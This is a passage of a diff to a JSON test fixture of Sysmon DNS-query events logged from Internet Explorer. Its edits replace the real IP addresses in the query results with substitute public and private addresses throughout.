rtb.adgrx.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "channel": "Microsoft-Windows-Sysmon/Operational", @@ -1955,7 +1955,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802413000Z'/\u003e\u003cEventRecordID\u003e105\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.107\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.adgrx.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 rtb.adgrx.com;::ffff:173.231.178.117;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802413000Z'/\u003e\u003cEventRecordID\u003e105\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.107\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.adgrx.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 rtb.adgrx.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" } @@ -1978,7 +1978,7 @@ }, "event_data": { "QueryStatus": "0", - "QueryResults": "type: 5 j2waycm.netmng.com;type: 5 j2waycm-us-wdc.netmng.com;::ffff:104.193.83.156;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;", + "QueryResults": "type: 5 j2waycm.netmng.com;type: 5 j2waycm-us-wdc.netmng.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.107", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -1996,7 +1996,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802423900Z'/\u003e\u003cEventRecordID\u003e106\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.107\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecsm2waycm-atl.netmng.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 j2waycm.netmng.com;type: 5 j2waycm-us-wdc.netmng.com;::ffff:104.193.83.156;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802423900Z'/\u003e\u003cEventRecordID\u003e106\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.107\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecsm2waycm-atl.netmng.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 j2waycm.netmng.com;type: 5 j2waycm-us-wdc.netmng.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -2066,7 +2066,7 @@ "event_data": { "QueryName": "pr-bh.ybp.yahoo.com", "QueryStatus": "0", - "QueryResults": "type: 5 ds-pr-bh.ybp.gysm.yahoodns.net;::ffff:72.30.2.182;", + "QueryResults": "type: 5 ds-pr-bh.ybp.gysm.yahoodns.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.112", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -2077,7 +2077,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802433000Z'/\u003e\u003cEventRecordID\u003e107\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.112\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epr-bh.ybp.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ds-pr-bh.ybp.gysm.yahoodns.net;::ffff:72.30.2.182;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802433000Z'/\u003e\u003cEventRecordID\u003e107\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.112\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epr-bh.ybp.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ds-pr-bh.ybp.gysm.yahoodns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -2090,7 +2090,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802441200Z'/\u003e\u003cEventRecordID\u003e108\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.113\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eps.eyeota.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:3.83.220.223;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802441200Z'/\u003e\u003cEventRecordID\u003e108\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.113\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eps.eyeota.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" }, @@ -2108,7 +2108,7 @@ }, "event_data": { "QueryStatus": "0", - "QueryResults": "::ffff:3.83.220.223;", + "QueryResults": "::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.113", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -2188,7 +2188,7 @@ "event": { "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802456000Z'/\u003e\u003cEventRecordID\u003e109\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.146\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eidpix.media6degrees.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 idpix.media6degrees.com.cdn.cloudflare.net;type: 5 map.media6degrees.com;type: 5 map.media6degrees.com.cdn.cloudflare.net;::ffff:204.2.197.201;::ffff:204.2.197.211;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802456000Z'/\u003e\u003cEventRecordID\u003e109\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.146\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eidpix.media6degrees.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 idpix.media6degrees.com.cdn.cloudflare.net;type: 5 map.media6degrees.com;type: 5 map.media6degrees.com.cdn.cloudflare.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22" }, "winlog": { @@ -2210,7 +2210,7 @@ "event_data": { "QueryName": "idpix.media6degrees.com", "QueryStatus": "0", - "QueryResults": "type: 5 idpix.media6degrees.com.cdn.cloudflare.net;type: 5 map.media6degrees.com;type: 5 map.media6degrees.com.cdn.cloudflare.net;::ffff:204.2.197.201;::ffff:204.2.197.211;", + "QueryResults": "type: 5 idpix.media6degrees.com.cdn.cloudflare.net;type: 5 map.media6degrees.com;type: 5 map.media6degrees.com.cdn.cloudflare.net;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.146", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -2235,7 +2235,7 @@ "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802466200Z'/\u003e\u003cEventRecordID\u003e110\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.146\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etpc.googlesyndication.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead-googlehosted.l.google.com;::ffff:172.217.10.1;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802466200Z'/\u003e\u003cEventRecordID\u003e110\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.146\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etpc.googlesyndication.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead-googlehosted.l.google.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" }, "log": { "level": "information" @@ -2261,7 +2261,7 @@ "ProcessId": "2736", "QueryName": "tpc.googlesyndication.com", "QueryStatus": "0", - "QueryResults": "type: 5 pagead-googlehosted.l.google.com;::ffff:172.217.10.1;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;", + "QueryResults": "type: 5 pagead-googlehosted.l.google.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.146" }, @@ -2332,7 +2332,7 @@ { "@timestamp": "2021-05-05T15:30:51.698Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802480600Z'/\u003e\u003cEventRecordID\u003e111\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.182\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eimage2.pubmatic.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pug44000nfc.pubmatic.com;type: 5 pug44000nf.pubmatic.com;::ffff:162.248.19.147;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802480600Z'/\u003e\u003cEventRecordID\u003e111\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.182\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData 